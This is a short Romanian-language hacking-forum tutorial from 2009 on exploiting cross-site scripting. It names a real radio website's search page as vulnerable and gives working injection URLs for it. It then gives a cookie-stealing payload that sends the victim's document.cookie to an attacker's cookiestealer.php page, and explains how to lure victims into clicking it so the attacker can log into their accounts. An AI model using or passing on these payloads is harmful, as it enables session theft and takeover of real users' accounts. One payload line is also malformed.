================================ Nik: Snikk Date: 14.02.2009 Site: http://rstcenter.com/ ================================ De obicei, vulnerabilitatea XSS este legata de cookieuri si message boxuri. Sa presupunem ca am gasit un site vulnerabil la XSS. Fie acesta: http://www.radio3net.ro/ Scriptul il scriem in search: <script>alert(/HellSoft/)</script> Acest script adaugat la URL: <script>alert(/HellSoft/)</script> nu face nimic mai mult decat a insera un message box in pui tu un text care vrei. Spre exemplu modific <script>alert(/HellSoft/)</script> cu <script>alert(/HellGate/)</script> .Tot aceiasi erroare v-a da... URL va arata in felul urmator: http://www.radio3net.ro/search.php?str=%3Cscript%3Ealert(%2FHellGate%2F)%3C%2Fscript%3E&cx=best500albums Decoamdata vulnerabilitatea nu face nimic, dar o putem exploata si mai mult. In loc de mesajul (HellSoft) dintre cele 2 paranteze ale alertului (ale scriptului) putem introduce: document.cookie si javascriptul care trebuie bagat la URL va arata in felul urmator: <script>alert(document.cookie)</script> . Si in cazul XSS-ului nostru: http://www.radio3net.ro/search.php?str=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&cx=best500albums Acest script genereaza un Message Box in care se afla cookieurile tale. Acum sa vedem cum sa facem rost si de cookieurile altor useri, ca apoi sa ma loghez pe conturile lor folosind acest cookie. Sa consideram urmatorul cod: <SCRIPT>location.href=”http://www.radio3net.ro/search.php?str=''+escape(document.cookie)</SCRIPT> Acest cod il introducem la url si il trimitem apoi (url’ul) la victima. Daca aceasta da click pe link, atunci cookieurile sale vor ramane la tine pe FTP sau ti se vor trimite pe mail, depinde cum este conceput stealerul. Exemplu de link: www.sitevulnerabil.com/pagvuln.php?ceva=<SCRIPT>location.href=”http://www.siteultau.com/cookiestealer.php?c=”+escape(document.cookie)</SCRIPT>